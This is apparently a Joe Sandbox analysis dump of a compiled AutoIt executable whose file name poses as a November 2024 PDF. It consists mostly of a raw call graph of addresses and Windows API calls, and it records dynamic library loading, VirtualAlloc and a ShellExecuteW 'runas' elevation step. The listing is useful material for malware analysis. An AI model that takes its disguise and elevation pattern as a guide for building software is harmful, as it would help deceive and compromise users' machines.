97726->97730 97727 785066 97728 772f95 _free 58 API calls 97727->97728 97728->97725 97730->97723 97730->97725 97730->97726 97730->97727 97731 78507d 97730->97731 97789 784857 58 API calls __fclose_nolock 97730->97789 97790 779006 IsProcessorFeaturePresent 97731->97790 97733 785089 97733->97654 97735 77333b __IsNonwritableInCurrentImage 97734->97735 97813 77a711 97735->97813 97737 773359 __initterm_e 97738 772f80 __cinit 67 API calls 97737->97738 97739 773378 _doexit __IsNonwritableInCurrentImage 97737->97739 97738->97739 97739->97658 97741 754948 97740->97741 97751 7549e7 97740->97751 97742 754982 IsThemeActive 97741->97742 97816 7735ac 97742->97816 97746 7549ae 97828 754a5b SystemParametersInfoW SystemParametersInfoW 97746->97828 97748 7549ba 97829 753b4c 97748->97829 97750 7549c2 SystemParametersInfoW 97750->97751 97751->97662 97752->97636 97753->97640 97754->97648 97758->97663 97759->97666 97760->97672 97761->97674 97762->97678 97763->97679 97767 778a1c 97764->97767 97766 778a57 97766->97683 97770 77a026 TlsSetValue 97766->97770 97767->97766 97769 778a3a 97767->97769 97773 785446 97767->97773 97769->97766 97769->97767 97781 77a372 Sleep 97769->97781 97770->97686 97771->97690 97772->97687 97774 785451 97773->97774 97780 78546c 97773->97780 97775 78545d 97774->97775 97774->97780 97782 778d68 58 API calls __getptd_noexit 97775->97782 97776 78547c HeapAlloc 97779 785462 97776->97779 97776->97780 97779->97767 97780->97776 97780->97779 97783 7735e1 DecodePointer 97780->97783 97781->97769 97782->97779 97783->97780 97784->97705 97785->97707 97786->97698 97787->97714 97788->97719 97789->97730 97791 779011 97790->97791 97796 778e99 97791->97796 97795 77902c 97795->97733 97797 778eb3 _memset ___raise_securityfailure 97796->97797 97798 778ed3 IsDebuggerPresent 97797->97798 97804 77a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97798->97804 97801 778f97 ___raise_securityfailure 97805 77c836 97801->97805 97802 778fba 97803 77a380 GetCurrentProcess TerminateProcess 
97802->97803 97803->97795 97804->97801 97806 77c840 IsProcessorFeaturePresent 97805->97806 97807 77c83e 97805->97807 97809 785b5a 97806->97809 97807->97802 97812 785b09 5 API calls ___raise_securityfailure 97809->97812 97811 785c3d 97811->97802 97812->97811 97814 77a714 EncodePointer 97813->97814 97814->97814 97815 77a72e 97814->97815 97815->97737 97817 779e4b __lock 58 API calls 97816->97817 97818 7735b7 DecodePointer EncodePointer 97817->97818 97881 779fb5 LeaveCriticalSection 97818->97881 97820 7549a7 97821 773614 97820->97821 97822 77361e 97821->97822 97823 773638 97821->97823 97822->97823 97882 778d68 58 API calls __getptd_noexit 97822->97882 97823->97746 97825 773628 97883 778ff6 9 API calls __fclose_nolock 97825->97883 97827 773633 97827->97746 97828->97748 97830 753b59 __ftell_nolock 97829->97830 97831 7577c7 59 API calls 97830->97831 97832 753b63 GetCurrentDirectoryW 97831->97832 97884 753778 97832->97884 97834 753b8c IsDebuggerPresent 97835 78d4ad MessageBoxA 97834->97835 97836 753b9a 97834->97836 97839 78d4c7 97835->97839 97837 753c73 97836->97837 97836->97839 97840 753bb7 97836->97840 97838 753c7a SetCurrentDirectoryW 97837->97838 97841 753c87 Mailbox 97838->97841 98094 757373 59 API calls Mailbox 97839->98094 97965 7573e5 97840->97965 97841->97750 97845 753bd5 GetFullPathNameW 97846 757d2c 59 API calls 97845->97846 97848 753c10 97846->97848 97847 78d4d7 97849 78d4ed SetCurrentDirectoryW 97847->97849 97981 760a8d 97848->97981 97849->97841 97852 753c2e 97853 753c38 97852->97853 98095 7b4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97852->98095 97997 753a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97853->97997 97856 78d50a 97856->97853 97859 78d51b 97856->97859 98096 754864 97859->98096 97860 753c42 97862 753c55 97860->97862 98005 7543db 97860->98005 98016 760b30 97862->98016 97863 78d523 98103 757f41 97863->98103 97867 753c60 97867->97837 98093 7544cb Shell_NotifyIconW _memset 97867->98093 97868 78d530 97870 78d53a 
97868->97870 97871 78d55f 97868->97871 98107 757e0b 97870->98107 97872 757e0b 59 API calls 97871->97872 97874 78d55b GetForegroundWindow ShellExecuteW 97872->97874 97878 78d58f Mailbox 97874->97878 97878->97837 97881->97820 97882->97825 97883->97827 97885 7577c7 59 API calls 97884->97885 97886 75378e 97885->97886 98123 753d43 97886->98123 97888 7537ac 97889 754864 61 API calls 97888->97889 97890 7537c0 97889->97890 97891 757f41 59 API calls 97890->97891 97892 7537cd 97891->97892 98137 754f3d 97892->98137 97895 78d3ae 98208 7b97e5 97895->98208 97896 7537ee Mailbox 98161 7581a7 97896->98161 97899 78d3cd 97902 772f95 _free 58 API calls 97899->97902 97905 78d3da 97902->97905 97906 754faa 84 API calls 97905->97906 97908 78d3e3 97906->97908 97912 753ee2 59 API calls 97908->97912 97909 757f41 59 API calls 97910 75381a 97909->97910 98168 758620 97910->98168 97914 78d3fe 97912->97914 97913 75382c Mailbox 97915 757f41 59 API calls 97913->97915 97916 753ee2 59 API calls 97914->97916 97917 753852 97915->97917 97918 78d41a 97916->97918 97919 758620 69 API calls 97917->97919 97920 754864 61 API calls 97918->97920 97922 753861 Mailbox 97919->97922 97921 78d43f 97920->97921 97923 753ee2 59 API calls 97921->97923 97924 7577c7 59 API calls 97922->97924 97925 78d44b 97923->97925 97927 75387f 97924->97927 97926 7581a7 59 API calls 97925->97926 97928 78d459 97926->97928 98172 753ee2 97927->98172 97930 753ee2 59 API calls 97928->97930 97932 78d468 97930->97932 97938 7581a7 59 API calls 97932->97938 97934 753899 97934->97908 97935 7538a3 97934->97935 97936 77313d _W_store_winword 60 API calls 97935->97936 97937 7538ae 97936->97937 97937->97914 97939 7538b8 97937->97939 97940 78d48a 97938->97940 97941 77313d _W_store_winword 60 API calls 97939->97941 97942 753ee2 59 API calls 97940->97942 97943 7538c3 97941->97943 97944 78d497 97942->97944 97943->97918 97945 7538cd 97943->97945 97944->97944 97946 77313d _W_store_winword 60 API calls 97945->97946 97947 7538d8 97946->97947 97947->97932 
97948 753919 97947->97948 97950 753ee2 59 API calls 97947->97950 97948->97932 97949 753926 97948->97949 98188 75942e 97949->98188 97951 7538fc 97950->97951 97953 7581a7 59 API calls 97951->97953 97955 75390a 97953->97955 97957 753ee2 59 API calls 97955->97957 97957->97948 97960 7593ea 59 API calls 97962 753961 97960->97962 97961 759040 60 API calls 97961->97962 97962->97960 97962->97961 97963 753ee2 59 API calls 97962->97963 97964 7539a7 Mailbox 97962->97964 97963->97962 97964->97834 97966 7573f2 __ftell_nolock 97965->97966 97967 78ee4b _memset 97966->97967 97968 75740b 97966->97968 97970 78ee67 GetOpenFileNameW 97967->97970 99074 7548ae 97968->99074 97972 78eeb6 97970->97972 97974 757d2c 59 API calls 97972->97974 97976 78eecb 97974->97976 97976->97976 97978 757429 99102 7569ca 97978->99102 97982 760a9a __ftell_nolock 97981->97982 99350 756ee0 97982->99350 97984 760a9f 97985 753c26 97984->97985 99361 7612fe 89 API calls 97984->99361 97985->97847 97985->97852 97987 760aac 97987->97985 99362 764047 91 API calls Mailbox 97987->99362 97989 760ab5 97989->97985 97990 760ab9 GetFullPathNameW 97989->97990 97991 757d2c 59 API calls 97990->97991 97992 760ae5 97991->97992 97993 757d2c 59 API calls 97992->97993 97994 760af2 97993->97994 97995 7950d5 _wcscat 97994->97995 97996 757d2c 59 API calls 97994->97996 97996->97985 97998 78d49c 97997->97998 97999 753ac2 LoadImageW RegisterClassExW 97997->97999 99406 7548fe LoadImageW EnumResourceNamesW 97998->99406 99405 753041 7 API calls 97999->99405 98002 753b46 98004 7539e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98002->98004 98003 78d4a5 98004->97860 98006 754406 _memset 98005->98006 99407 754213 98006->99407 98009 75448b 98011 7544a5 Shell_NotifyIconW 98009->98011 98012 7544c1 Shell_NotifyIconW 98009->98012 98013 7544b3 98011->98013 98012->98013 99411 75410d 98013->99411 98015 7544ba 98015->97862 98017 7950ed 98016->98017 98028 760b55 98016->98028 99466 7ba0b5 89 API calls 4 library calls 98017->99466 98019 760e5a 
98019->97867 98021 761044 98021->98019 98023 761051 98021->98023 99464 7611f3 331 API calls Mailbox 98023->99464 98024 760bab PeekMessageW 98091 760b65 Mailbox 98024->98091 98026 761058 LockWindowUpdate DestroyWindow GetMessageW 98026->98019 98030 76108a 98026->98030 98028->98091 99467 759fbd 60 API calls 98028->99467 99468 7a68bf 331 API calls 98028->99468 98029 7952ab Sleep 98029->98091 98033 796082 TranslateMessage DispatchMessageW GetMessageW 98030->98033 98031 760e44 98031->98019 99463 7611d0 10 API calls Mailbox 98031->99463 98033->98033 98034 7960b2 98033->98034 98034->98019 98035 760fa3 PeekMessageW 98035->98091 98036 760fbf TranslateMessage DispatchMessageW 98036->98035 98037 79517a TranslateAcceleratorW 98037->98035 98037->98091 98038 759fbd 60 API calls 98038->98091 98039 760e73 timeGetTime 98039->98091 98040 795c49 WaitForSingleObject 98042 795c66 GetExitCodeProcess CloseHandle 98040->98042 98040->98091 98075 7610f5 98042->98075 98043 760fdd Sleep 98077 760fee Mailbox 98043->98077 98044 7581a7 59 API calls 98044->98091 98045 7577c7 59 API calls 98045->98077 98047 770ff6 59 API calls Mailbox 98047->98091 98048 795f22 Sleep 98048->98077 98050 770719 timeGetTime 98050->98077 98051 7610ae timeGetTime 99465 759fbd 60 API calls 98051->99465 98054 795fb9 GetExitCodeProcess 98056 795fcf WaitForSingleObject 98054->98056 98057 795fe5 CloseHandle 98054->98057 98056->98057 98056->98091 98057->98077 98060 7d61ac 110 API calls 98060->98077 98061 75b93d 109 API calls 98061->98077 98062 795c9e 98062->98075 98063 796041 Sleep 98063->98091 98064 7954a2 Sleep 98064->98091 98066 757f41 59 API calls 98066->98077 98070 75a000 304 API calls 98070->98091 98075->97867 98077->98045 98077->98050 98077->98054 98077->98060 98077->98061 98077->98062 98077->98063 98077->98064 98077->98066 98077->98075 98077->98091 99493 7b28f7 60 API calls 98077->99493 99494 759fbd 60 API calls 98077->99494 99495 758b13 69 API calls Mailbox 98077->99495 99496 75b89c 331 API calls 98077->99496 99497 
7a6a50 60 API calls 98077->99497 99498 7b54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98077->99498 99499 7b3e91 66 API calls Mailbox 98077->99499 98078 7ba0b5 89 API calls 98078->98091 98080 758620 69 API calls 98080->98091 98081 759df0 59 API calls Mailbox 98081->98091 98082 7a66f4 59 API calls Mailbox 98082->98091 98084 757f41 59 API calls 98084->98091 98085 7959ff VariantClear 98085->98091 98086 795a95 VariantClear 98086->98091 98087 758e34 59 API calls Mailbox 98087->98091 98088 795843 VariantClear 98088->98091 98089 7a7405 59 API calls 98089->98091 98090 758b13 69 API calls 98090->98091 98091->98024 98091->98029 98091->98031 98091->98035 98091->98036 98091->98037 98091->98038 98091->98039 98091->98040 98091->98043 98091->98044 98091->98047 98091->98048 98091->98051 98091->98070 98091->98075 98091->98077 98091->98078 98091->98080 98091->98081 98091->98082 98091->98084 98091->98085 98091->98086 98091->98087 98091->98088 98091->98089 98091->98090 98092 75b89c 304 API calls 98091->98092 99434 75e580 98091->99434 99441 75f5c0 98091->99441 99460 75e800 331 API calls 2 library calls 98091->99460 99461 75fe40 331 API calls 2 library calls 98091->99461 99462 7531ce IsDialogMessageW GetClassLongW 98091->99462 99469 7d629f 59 API calls 98091->99469 99470 7b9c9f 59 API calls Mailbox 98091->99470 99471 7ad9e3 59 API calls 98091->99471 99472 759997 98091->99472 99490 7a6665 59 API calls 2 library calls 98091->99490 99491 758561 59 API calls 98091->99491 99492 75843f 59 API calls Mailbox 98091->99492 98092->98091 98093->97837 98094->97847 98095->97856 98097 781b90 __ftell_nolock 98096->98097 98098 754871 GetModuleFileNameW 98097->98098 98099 757f41 59 API calls 98098->98099 98100 754897 98099->98100 98101 7548ae 60 API calls 98100->98101 98102 7548a1 Mailbox 98101->98102 98102->97863 98104 757f50 __wsetenvp _memmove 98103->98104 98105 770ff6 Mailbox 59 API calls 98104->98105 98106 757f8e 98105->98106 98106->97868 98108 757e1f 
98107->98108 98109 78f173 98107->98109 99754 757db0 98108->99754 98110 758189 59 API calls 98109->98110 98113 78f17e __wsetenvp _memmove 98110->98113 98112 757e2a 98114 757c8e 98112->98114 98115 757ca0 98114->98115 98116 78f094 98114->98116 99759 757bb1 98115->99759 98124 753d50 __ftell_nolock 98123->98124 98125 757d2c 59 API calls 98124->98125 98129 753eb6 Mailbox 98124->98129 98127 753d82 98125->98127 98135 753db8 Mailbox 98127->98135 98249 757b52 98127->98249 98128 753e89 98128->98129 98130 757f41 59 API calls 98128->98130 98129->97888 98132 753eaa 98130->98132 98131 757f41 59 API calls 98131->98135 98133 753f84 59 API calls 98132->98133 98133->98129 98135->98128 98135->98129 98135->98131 98136 757b52 59 API calls 98135->98136 98252 753f84 98135->98252 98136->98135 98258 754d13 98137->98258 98142 78dd0f 98144 754faa 84 API calls 98142->98144 98143 754f68 LoadLibraryExW 98268 754cc8 98143->98268 98147 78dd16 98144->98147 98149 754cc8 3 API calls 98147->98149 98151 78dd1e 98149->98151 98150 754f8f 98150->98151 98152 754f9b 98150->98152 98294 75506b 98151->98294 98153 754faa 84 API calls 98152->98153 98155 7537e6 98153->98155 98155->97895 98155->97896 98158 78dd45 98302 755027 98158->98302 98160 78dd52 98162 7581b2 98161->98162 98163 753801 98161->98163 98732 7580d7 59 API calls 2 library calls 98162->98732 98165 7593ea 98163->98165 98166 770ff6 Mailbox 59 API calls 98165->98166 98167 75380d 98166->98167 98167->97909 98169 75862b 98168->98169 98171 758652 98169->98171 98733 758b13 69 API calls Mailbox 98169->98733 98171->97913 98173 753f05 98172->98173 98174 753eec 98172->98174 98175 757d2c 59 API calls 98173->98175 98176 7581a7 59 API calls 98174->98176 98177 75388b 98175->98177 98176->98177 98178 77313d 98177->98178 98179 7731be 98178->98179 98180 773149 98178->98180 98736 7731d0 60 API calls 3 library calls 98179->98736 98182 77316e 98180->98182 98734 778d68 58 API calls __getptd_noexit 98180->98734 98182->97934 98184 7731cb 98184->97934 98185 773155 98735 
778ff6 9 API calls __fclose_nolock 98185->98735 98187 773160 98187->97934 98189 759436 98188->98189 98190 770ff6 Mailbox 59 API calls 98189->98190 98191 759444 98190->98191 98192 753936 98191->98192 98737 75935c 59 API calls Mailbox 98191->98737 98194 7591b0 98192->98194 98738 7592c0 98194->98738 98196 7591bf 98197 770ff6 Mailbox 59 API calls 98196->98197 98198 753944 98196->98198 98197->98198 98199 759040 98198->98199 98200 759057 98199->98200 98201 78f5a5 98199->98201 98203 75915f 98200->98203 98204 7591a0 98200->98204 98205 759158 98200->98205 98201->98200 98748 758d3b 59 API calls Mailbox 98201->98748 98203->97962 98747 759e9c 60 API calls Mailbox 98204->98747 98207 770ff6 Mailbox 59 API calls 98205->98207 98207->98203 98209 755045 85 API calls 98208->98209 98210 7b9854 98209->98210 98749 7b99be 98210->98749 98213 75506b 74 API calls 98214 7b9881 98213->98214 98215 75506b 74 API calls 98214->98215 98216 7b9891 98215->98216 98217 75506b 74 API calls 98216->98217 98218 7b98ac 98217->98218 98219 75506b 74 API calls 98218->98219 98220 7b98c7 98219->98220 98221 755045 85 API calls 98220->98221 98222 7b98de 98221->98222 98223 77594c __malloc_crt 58 API calls 98222->98223 98224 7b98e5 98223->98224 98225 77594c __malloc_crt 58 API calls 98224->98225 98226 7b98ef 98225->98226 98227 75506b 74 API calls 98226->98227 98228 7b9903 98227->98228 98229 7b9393 GetSystemTimeAsFileTime 98228->98229 98230 7b9916 98229->98230 98231 7b992b 98230->98231 98232 7b9940 98230->98232 98233 772f95 _free 58 API calls 98231->98233 98234 7b9946 98232->98234 98235 7b99a5 98232->98235 98238 7b9931 98233->98238 98755 7b8d90 98234->98755 98237 772f95 _free 58 API calls 98235->98237 98242 78d3c1 98237->98242 98240 772f95 _free 58 API calls 98238->98240 98240->98242 98241 772f95 _free 58 API calls 98241->98242 98242->97899 98243 754faa 98242->98243 98244 754fb4 98243->98244 98245 754fbb 98243->98245 98246 7755d6 __fcloseall 83 API calls 98244->98246 98247 754fdb FreeLibrary 98245->98247 98248 
754fca 98245->98248 98246->98245 98247->98248 98248->97899 98250 757faf 59 API calls 98249->98250 98251 757b5d 98250->98251 98251->98127 98253 753f92 98252->98253 98257 753fb4 _memmove 98252->98257 98256 770ff6 Mailbox 59 API calls 98253->98256 98254 770ff6 Mailbox 59 API calls 98255 753fc8 98254->98255 98255->98135 98256->98257 98257->98254 98307 754d61 98258->98307 98261 754d53 98265 77548b 98261->98265 98262 754d4a FreeLibrary 98262->98261 98263 754d61 2 API calls 98264 754d3a 98263->98264 98264->98261 98264->98262 98311 7754a0 98265->98311 98267 754f5c 98267->98142 98267->98143 98469 754d94 98268->98469 98271 754cff FreeLibrary 98272 754d08 98271->98272 98275 754dd0 98272->98275 98273 754d94 2 API calls 98274 754ced 98273->98274 98274->98271 98274->98272 98276 770ff6 Mailbox 59 API calls 98275->98276 98277 754de5 98276->98277 98473 75538e 98277->98473 98279 754df1 _memmove 98280 754e2c 98279->98280 98281 754f21 98279->98281 98282 754ee9 98279->98282 98283 755027 69 API calls 98280->98283 98487 7b9ba5 95 API calls 98281->98487 98476 754fe9 CreateStreamOnHGlobal 98282->98476 98291 754e35 98283->98291 98286 75506b 74 API calls 98286->98291 98287 754ec9 98287->98150 98289 78dcd0 98290 755045 85 API calls 98289->98290 98292 78dce4 98290->98292 98291->98286 98291->98287 98291->98289 98482 755045 98291->98482 98293 75506b 74 API calls 98292->98293 98293->98287 98295 75507d 98294->98295 98296 78ddf6 98294->98296 98511 775812 98295->98511 98299 7b9393 98709 7b91e9 98299->98709 98301 7b93a9 98301->98158 98303 78ddb9 98302->98303 98304 755036 98302->98304 98714 775e90 98304->98714 98306 75503e 98306->98160 98308 754d2e 98307->98308 98309 754d6a LoadLibraryA 98307->98309 98308->98263 98308->98264 98309->98308 98310 754d7b GetProcAddress 98309->98310 98310->98308 98314 7754ac __alloc_osfhnd 98311->98314 98312 7754bf 98360 778d68 58 API calls __getptd_noexit 98312->98360 98314->98312 98316 7754f0 98314->98316 98315 7754c4 98361 778ff6 9 API calls __fclose_nolock 98315->98361 
98330 780738 98316->98330 98319 7754f5 98320 7754fe 98319->98320 98321 77550b 98319->98321 98362 778d68 58 API calls __getptd_noexit 98320->98362 98323 775535 98321->98323 98324 775515 98321->98324 98345 780857 98323->98345 98363 778d68 58 API calls __getptd_noexit 98324->98363 98325 7754cf __alloc_osfhnd @_EH4_CallFilterFunc@8 98325->98267 98331 780744 __alloc_osfhnd 98330->98331 98332 779e4b __lock 58 API calls 98331->98332 98342 780752 98332->98342 98333 7807c6 98365 78084e 98333->98365 98334 7807cd 98370 778a5d 58 API calls 2 library calls 98334->98370 98337 780843 __alloc_osfhnd 98337->98319 98338 7807d4 98338->98333 98371 77a06b InitializeCriticalSectionAndSpinCount 98338->98371 98341 779ed3 __mtinitlocknum 58 API calls 98341->98342 98342->98333 98342->98334 98342->98341 98368 776e8d 59 API calls __lock 98342->98368 98369 776ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98342->98369 98343 7807fa EnterCriticalSection 98343->98333 98346 780877 __wopenfile 98345->98346 98347 780891 98346->98347 98359 780a4c 98346->98359 98378 773a0b 60 API calls 2 library calls 98346->98378 98376 778d68 58 API calls __getptd_noexit 98347->98376 98349 780896 98377 778ff6 9 API calls __fclose_nolock 98349->98377 98351 780aaf 98373 7887f1 98351->98373 98352 775540 98364 775562 LeaveCriticalSection LeaveCriticalSection _fprintf 98352->98364 98355 780a45 98355->98359 98379 773a0b 60 API calls 2 library calls 98355->98379 98357 780a64 98357->98359 98380 773a0b 60 API calls 2 library calls 98357->98380 98359->98347 98359->98351 98360->98315 98361->98325 98362->98325 98363->98325 98364->98325 98372 779fb5 LeaveCriticalSection 98365->98372 98367 780855 98367->98337 98368->98342 98369->98342 98370->98338 98371->98343 98372->98367 98381 787fd5 98373->98381 98375 78880a 98375->98352 98376->98349 98377->98352 98378->98355 98379->98357 98380->98359 98382 787fe1 __alloc_osfhnd 98381->98382 98383 787ff7 98382->98383 98385 78802d 98382->98385 98466 778d68 58 API calls __getptd_noexit 
98383->98466 98392 78809e 98385->98392 98386 787ffc 98467 778ff6 9 API calls __fclose_nolock 98386->98467 98389 788049 98468 788072 LeaveCriticalSection __unlock_fhandle 98389->98468 98391 788006 __alloc_osfhnd 98391->98375 98393 7880be 98392->98393 98394 77471a __wsopen_nolock 58 API calls 98393->98394 98397 7880da 98394->98397 98395 779006 __invoke_watson 8 API calls 98396 7887f0 98395->98396 98398 787fd5 __wsopen_helper 103 API calls 98396->98398 98399 788114 98397->98399 98406 788137 98397->98406 98465 788211 98397->98465 98401 78880a 98398->98401 98400 778d34 __dosmaperr 58 API calls 98399->98400 98402 788119 98400->98402 98401->98389 98403 778d68 __fclose_nolock 58 API calls 98402->98403 98404 788126 98403->98404 98407 778ff6 __fclose_nolock 9 API calls 98404->98407 98405 7881f5 98408 778d34 __dosmaperr 58 API calls 98405->98408 98406->98405 98413 7881d3 98406->98413 98409 788130 98407->98409 98410 7881fa 98408->98410 98409->98389 98411 778d68 __fclose_nolock 58 API calls 98410->98411 98412 788207 98411->98412 98414 778ff6 __fclose_nolock 9 API calls 98412->98414 98415 77d4d4 __alloc_osfhnd 61 API calls 98413->98415 98414->98465 98416 7882a1 98415->98416 98417 7882ab 98416->98417 98418 7882ce 98416->98418 98420 778d34 __dosmaperr 58 API calls 98417->98420 98419 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98418->98419 98430 7882f0 98419->98430 98421 7882b0 98420->98421 98422 778d68 __fclose_nolock 58 API calls 98421->98422 98424 7882ba 98422->98424 98423 78836e GetFileType 98425 788379 GetLastError 98423->98425 98426 7883bb 98423->98426 98428 778d68 __fclose_nolock 58 API calls 98424->98428 98429 778d47 __dosmaperr 58 API calls 98425->98429 98435 77d76a __set_osfhnd 59 API calls 98426->98435 98427 78833c GetLastError 98431 778d47 __dosmaperr 58 API calls 98427->98431 98428->98409 98433 7883a0 CloseHandle 98429->98433 98430->98423 98430->98427 98434 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98430->98434 98432 788361 
98431->98432 98439 778d68 __fclose_nolock 58 API calls 98432->98439 98433->98432 98436 7883ae 98433->98436 98437 788331 98434->98437 98438 7883d9 98435->98438 98440 778d68 __fclose_nolock 58 API calls 98436->98440 98437->98423 98437->98427 98442 788594 98438->98442 98443 781b11 __lseeki64_nolock 60 API calls 98438->98443 98460 78845a 98438->98460 98439->98465 98441 7883b3 98440->98441 98441->98432 98444 788767 CloseHandle 98442->98444 98442->98465 98445 788443 98443->98445 98446 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98444->98446 98448 778d34 __dosmaperr 58 API calls 98445->98448 98445->98460 98447 78878e 98446->98447 98449 7887c2 98447->98449 98450 788796 GetLastError 98447->98450 98448->98460 98449->98465 98451 778d47 __dosmaperr 58 API calls 98450->98451 98454 7887a2 98451->98454 98452 78848c 98457 7899f2 __chsize_nolock 82 API calls 98452->98457 98452->98460 98453 781b11 60 API calls __lseeki64_nolock 98453->98460 98458 77d67d __free_osfhnd 59 API calls 98454->98458 98455 780d2d __close_nolock 61 API calls 98455->98460 98456 7810ab 70 API calls __read_nolock 98456->98460 98457->98452 98458->98449 98459 77dac6 __write 78 API calls 98459->98460 98460->98442 98460->98452 98460->98453 98460->98455 98460->98456 98460->98459 98461 788611 98460->98461 98462 780d2d __close_nolock 61 API calls 98461->98462 98463 788618 98462->98463 98464 778d68 __fclose_nolock 58 API calls 98463->98464 98464->98465 98465->98395 98466->98386 98467->98391 98468->98391 98470 754ce1 98469->98470 98471 754d9d LoadLibraryA 98469->98471 98470->98273 98470->98274 98471->98470 98472 754dae GetProcAddress 98471->98472 98472->98470 98474 770ff6 Mailbox 59 API calls 98473->98474 98475 7553a0 98474->98475 98475->98279 98477 755020 98476->98477 98478 755003 FindResourceExW 98476->98478 98477->98280 98478->98477 98479 78dd5c LoadResource 98478->98479 98479->98477 98480 78dd71 SizeofResource 98479->98480 98480->98477 98481 78dd85 LockResource 98480->98481 98481->98477 98483 
Mailbox 99998->100036 100037 759e9c 60 API calls Mailbox 99998->100037 100039 7cd95d 107 API calls _free 99998->100039 100000 757faf 59 API calls 99999->100000 100001 7cdad4 CharLowerBuffW 100000->100001 100040 7af658 100001->100040 100005 7577c7 59 API calls 100007 7cdb0d 100005->100007 100006 7cdb6c Mailbox 100006->99990 100008 7579ab 59 API calls 100007->100008 100009 7cdb24 100008->100009 100010 757e8c 59 API calls 100009->100010 100011 7cdb30 Mailbox 100010->100011 100011->100006 100047 7cd2f3 61 API calls 2 library calls 100011->100047 100013 7ccc9d 100012->100013 100017 7cccf2 100012->100017 100014 770ff6 Mailbox 59 API calls 100013->100014 100015 7cccbf 100014->100015 100016 770ff6 Mailbox 59 API calls 100015->100016 100015->100017 100016->100015 100018 7cdd64 100017->100018 100019 7cdf8d Mailbox 100018->100019 100025 7cdd87 _strcat _wcscpy __wsetenvp 100018->100025 100019->99977 100020 759c9c 59 API calls 100020->100025 100021 759cf8 59 API calls 100021->100025 100022 759d46 59 API calls 100022->100025 100023 759997 84 API calls 100023->100025 100024 77594c 58 API calls __malloc_crt 100024->100025 100025->100019 100025->100020 100025->100021 100025->100022 100025->100023 100025->100024 100050 7b5b29 61 API calls 2 library calls 100025->100050 100029 770e5d 100027->100029 100028 770ef5 VirtualAlloc 100030 770ec3 100028->100030 100029->100028 100029->100030 100030->99980 100030->99981 100031->99990 100032->99990 100033->99984 100034->99992 100035->99998 100036->99998 100037->99998 100038->99969 100039->99998 100042 7af683 __wsetenvp 100040->100042 100041 7af6c2 100041->100005 100041->100011 100042->100041 100044 7af6b8 100042->100044 100046 7af769 100042->100046 100044->100041 100048 757a24 61 API calls 100044->100048 100046->100041 100049 757a24 61 API calls 100046->100049 100047->100006 100048->100044 100049->100046 100050->100025

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00753B8C
                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                        • Part of subcall function 00760A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C26,008162F8,?,?,?), ref: 00760ACE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008093F0,00000010), ref: 0078D4BC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,008162F8,?,?,?), ref: 0078D4F4
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00805D40,008162F8,?,?,?), ref: 0078D57A
                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D581
                                                                                                                        • Part of subcall function 00753A58: GetSysColorBrush.USER32(0000000F), ref: 00753A62
                                                                                                                        • Part of subcall function 00753A58: LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(00000063), ref: 00753A88
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(000000A4), ref: 00753A9A
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(000000A2), ref: 00753AAC
                                                                                                                        • Part of subcall function 00753A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                                                                                                                        • Part of subcall function 00753A58: RegisterClassExW.USER32(?), ref: 00753B28
                                                                                                                        • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                                                                                                                        • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                                                                                                                        • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                                                                                                                        • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A53
                                                                                                                        • Part of subcall function 007543DB: _memset.LIBCMT ref: 00754401
                                                                                                                        • Part of subcall function 007543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
